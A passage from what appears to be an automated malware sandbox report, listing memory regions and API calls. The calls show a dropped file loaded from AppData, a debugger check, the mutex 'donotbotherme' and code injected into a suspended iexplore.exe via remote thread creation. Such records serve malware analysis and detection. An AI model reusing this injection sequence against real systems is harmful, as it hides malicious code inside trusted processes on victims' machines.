(normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 507 start_va = 0x75b00000 end_va = 0x75bcbfff entry_point = 0x75b00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 508 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 509 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 510 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 511 start_va = 0x260000 end_va = 0x266fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 512 start_va = 0x270000 end_va = 0x271fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 513 start_va = 0x810000 end_va = 0x990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 514 start_va = 0x9a0000 end_va = 0x1d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 515 start_va = 0x1da0000 end_va = 0x206efff entry_point = 0x1da0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 516 start_va = 0x2070000 end_va = 0x2462fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002070000" filename = "" Region: id = 517 start_va = 0x6fff0000 end_va = 0x6fffffff entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 518 start_va = 0x74c00000 end_va = 0x74c02fff entry_point = 0x74c00000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 519 start_va = 0x76b60000 end_va = 0x76beefff entry_point = 0x76b60000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 520 start_va = 0x25a0000 end_va = 0x25affff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 521 start_va = 0x26e0000 end_va = 0x26effff entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 522 start_va = 0x26f0000 end_va = 0x2aeffff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 523 start_va = 0x744b0000 end_va = 0x746effff entry_point = 0x744b0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 524 start_va = 0x3de20000 end_va = 0x3de2dfff entry_point = 0x3de20000 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 525 start_va = 0x74a70000 end_va = 0x74aeffff entry_point = 0x74a70000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 526 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 527 start_va = 0x320000 end_va = 0x3fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 528 start_va = 0x2ce0000 end_va = 0x2d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 529 start_va = 0x75650000 end_va = 0x756d2fff entry_point = 0x75650000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 530 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 531 start_va = 0x4d0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 532 start_va = 0x2470000 end_va = 0x256ffff entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 533 start_va = 0x25b0000 end_va = 0x26affff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 534 start_va = 0x74be0000 end_va = 0x74bf5fff entry_point = 0x74be0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 535 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 536 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 537 start_va = 0x746b0000 end_va = 0x746eafff entry_point = 0x746b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 538 start_va = 0x74bd0000 end_va = 0x74bddfff entry_point = 0x74bd0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 539 start_va = 0x510000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 540 start_va = 0x2af0000 end_va = 0x2beffff entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 541 start_va = 0x2bf0000 end_va = 0x2c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 542 start_va = 0x2c30000 end_va = 0x2caffff entry_point = 0x0 region_type = private name = "private_0x0000000002c30000" filename = "" Region: id = 543 start_va = 0x2d20000 end_va = 0x2e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 544 start_va = 0x2e20000 end_va = 0x2edffff entry_point = 0x2e20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 545 start_va = 0x2f90000 end_va = 0x2fcffff entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 546 start_va = 0x74a50000 end_va = 0x74a62fff entry_point = 0x74a50000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 547 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 548 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 549 start_va = 0x2fd0000 end_va = 0x38fffff entry_point = 0x2fd0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 550 start_va = 0x3900000 end_va = 0x39fffff entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 551 start_va = 0x74bb0000 end_va = 0x74bc5fff entry_point = 0x74bb0000 region_type = mapped_file name = "n.3" filename = "\\Users\\aETAdzjz\\AppData\\Local\\n.3" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\n.3") Region: id = 552 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 553 start_va = 0x550000 end_va = 0x551fff entry_point = 0x550000 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 554 start_va = 0x2ee0000 end_va = 0x2f85fff entry_point = 0x2ee0000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 571 start_va = 0x2ee0000 end_va = 0x2f84fff entry_point = 0x2ee0000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Thread: id = 23 os_tid = 0xad0 [0027.299] GetProcAddress (hModule=0x759f0000, lpProcName="WinExec") returned 0x75a82c21 [0027.299] GetProcAddress (hModule=0x759f0000, lpProcName="GetTempPathA") returned 0x75a2276c [0027.299] GetProcAddress (hModule=0x759f0000, lpProcName="MoveFileExA") returned 0x75a2ccc1 [0027.299] GetProcAddress (hModule=0x759f0000, lpProcName="ExitProcess") returned 0x75a07a10 [0027.299] GetTempPathA (in: nBufferLength=0x50, lpBuffer=0x18f1b8 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0027.299] MoveFileExA (lpExistingFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\a.b" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\a.b"), lpNewFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\n.3" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\n.3"), dwFlags=0x1) returned 1 [0027.300] LoadLibraryA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\n.3") returned 0x74bb0000 [0027.307] GetProcAddress (hModule=0x74bb0000, lpProcName=0x1) returned 0x74bb223d [0027.307] IsDebuggerPresent () returned 0 [0027.307] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="donotbotherme") returned 0x200 [0027.307] GetLastError () returned 0x0 [0027.307] CloseHandle (hObject=0x200) returned 1 [0027.307] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x18ee00, csidl=38, fCreate=1 | out: pszPath="C:\\Program Files (x86)") returned 1 [0027.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f08c, cbMultiByte=13, lpWideCharStr=0x18f008, cchWideChar=13 | out: lpWideCharStr="Kernel32.dll") returned 13 [0027.312] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x759f0000 [0027.312] GetProcAddress (hModule=0x759f0000, lpProcName="CreateProcessA") returned 0x75a01072 [0027.312] CreateProcessA (in: lpApplicationName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18ed98*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x3, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18eddc | out: lpCommandLine=0x0, lpProcessInformation=0x18eddc*(hProcess=0x20c, hThread=0x204, dwProcessId=0xae4, dwThreadId=0xae8)) returned 1 [0027.386] GetModuleFileNameA (in: hModule=0x74bb0000, lpFilename=0x18ef04, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\n.3" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\n.3")) returned 0x23 [0027.386] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualAllocEx") returned 0x75a1d9b0 [0027.386] GetProcAddress (hModule=0x759f0000, lpProcName="WriteProcessMemory") returned 0x75a1d9e0 [0027.386] VirtualAllocEx (hProcess=0x20c, lpAddress=0x0, dwSize=0x24, flAllocationType=0x1000, flProtect=0x4) returned 0x60000 [0027.386] WriteProcessMemory (in: hProcess=0x20c, lpBaseAddress=0x60000, lpBuffer=0x18ef04*, nSize=0x24, lpNumberOfBytesWritten=0x18edec | out: lpBuffer=0x18ef04*, lpNumberOfBytesWritten=0x18edec*=0x24) returned 1 [0027.387] GetProcAddress (hModule=0x759f0000, lpProcName="CreateRemoteThread") returned 0x75a8416b [0027.387] CreateRemoteThread (in: hProcess=0x20c, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x75a049d7, lpParameter=0x60000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x214 [0027.387] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0027.450] GetExitCodeThread (in: hThread=0x214, lpExitCode=0x18edf0 | out: lpExitCode=0x18edf0) returned 1 [0027.450] CreateRemoteThread (in: hProcess=0x20c, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74bb2238, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x210 [0027.450] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0xffffffff) returned 0x0 [0027.453] CloseHandle (hObject=0x20c) returned 1 [0027.453] ExitProcess (uExitCode=0x0) Thread: id = 24 os_tid = 0xad4 Thread: id = 25 os_tid = 0xad8 Thread: id = 26 os_tid = 0xadc Thread: id = 27 os_tid = 0xae0 Process: id = "3" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x548ba000" os_pid = "0xae4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xacc" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 555 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 556 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 557 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 558 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 559 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 560 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 561 start_va = 0xf10000 end_va = 0xfb5fff entry_point = 0xf10000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 562 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 563 start_va = 0x77270000 end_va = 0x773effff entry_point = 0x77270000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 564 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 565 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 566 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 567 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 568 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 569 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 570 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 572 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 573 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 574 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 575 start_va = 0x4f0000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 576 start_va = 0x74b00000 end_va = 0x74b07fff entry_point = 0x74b00000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 577 start_va = 0x74b10000 end_va = 0x74b6bfff entry_point = 0x74b10000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 578 start_va = 0x74b70000 end_va = 0x74baefff entry_point = 0x74b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 579 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 580 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 581 start_va = 0x75250000 end_va = 0x75295fff entry_point = 0x75250000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 582 start_va = 0x759f0000 end_va = 0x75afffff entry_point = 0x759f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 583 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x0 region_type = private name = "private_0x0000000076e70000" filename = "" Region: id = 584 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x0 region_type = private name = "private_0x0000000076f70000" filename = "" Region: id = 585 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 586 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 587 start_va = 0x74dc0000 end_va = 0x74dcbfff entry_point = 0x74dc0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 588 start_va = 0x74dd0000 end_va = 0x74e2ffff entry_point = 0x74dd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 589 start_va = 0x74e90000 end_va = 0x74ea8fff entry_point = 0x74e90000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 590 start_va = 0x74ec0000 end_va = 0x750bafff entry_point = 0x74ec0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 591 start_va = 0x750c0000 end_va = 0x750cbfff entry_point = 0x750c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 592 start_va = 0x750d0000 end_va = 0x75126fff entry_point = 0x750d0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 593 start_va = 0x75130000 end_va = 0x751bffff entry_point = 0x75130000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 594 start_va = 0x752a0000 end_va = 0x7534bfff entry_point = 0x752a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 595 start_va = 0x75350000 end_va = 0x75444fff entry_point = 0x75350000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 596 start_va = 0x75450000 end_va = 0x755abfff entry_point = 0x75450000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 597 start_va = 0x755b0000 end_va = 0x7564cfff entry_point = 0x755b0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 598 start_va = 0x756e0000 end_va = 0x7577ffff entry_point = 0x756e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 599 start_va = 0x75780000 end_va = 0x75789fff entry_point = 0x75780000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 600 start_va = 0x75790000 end_va = 0x7588ffff entry_point = 0x75790000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 601 start_va = 0x758d0000 end_va = 0x759ecfff entry_point = 0x758d0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 602 start_va = 0x75c50000 end_va = 0x76899fff entry_point = 0x75c50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 603 start_va = 0x76b60000 end_va = 0x76beefff entry_point = 0x76b60000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 604 start_va = 0x76c40000 end_va = 0x76d75fff entry_point = 0x76c40000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 605 start_va = 0x76d80000 end_va = 0x76e6ffff entry_point = 0x76d80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 606 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 607 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 608 start_va = 0x7f0000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 609 start_va = 0x800000 end_va = 0x987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 610 start_va = 0x74e30000 end_va = 0x74e8ffff entry_point = 0x74e30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 611 start_va = 0x75b00000 end_va = 0x75bcbfff entry_point = 0x75b00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 612 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 613 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 614 start_va = 0xb0000 end_va = 0xb1fff entry_point = 0xb0000 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 615 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 616 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 617 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 618 start_va = 0x990000 end_va = 0xb10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 619 start_va = 0xfc0000 end_va = 0x23bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fc0000" filename = "" Region: id = 620 start_va = 0x74bb0000 end_va = 0x74bc5fff entry_point = 0x74bb0000 region_type = mapped_file name = "n.3" filename = "\\Users\\aETAdzjz\\AppData\\Local\\n.3" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\n.3") Region: id = 621 start_va = 0x460000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 622 start_va = 0xb40000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 623 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 624 start_va = 0xd30000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 625 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 626 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 627 start_va = 0x23c0000 end_va = 0x33c0fff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 628 start_va = 0x70000 end_va = 0x84fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 629 start_va = 0x74c90000 end_va = 0x74cabfff entry_point = 0x74c90000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 685 start_va = 0x77240000 end_va = 0x77245fff entry_point = 0x77240000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 697 start_va = 0x74bd0000 end_va = 0x74bd6fff entry_point = 0x74bd0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 709 start_va = 0x790000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 710 start_va = 0x23e0000 end_va = 0x24dffff entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 711 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 712 start_va = 0x24e0000 end_va = 0x34e0fff entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 713 start_va = 0x90000 end_va = 0xa5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 714 start_va = 0x75890000 end_va = 0x758c4fff entry_point = 0x75890000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: 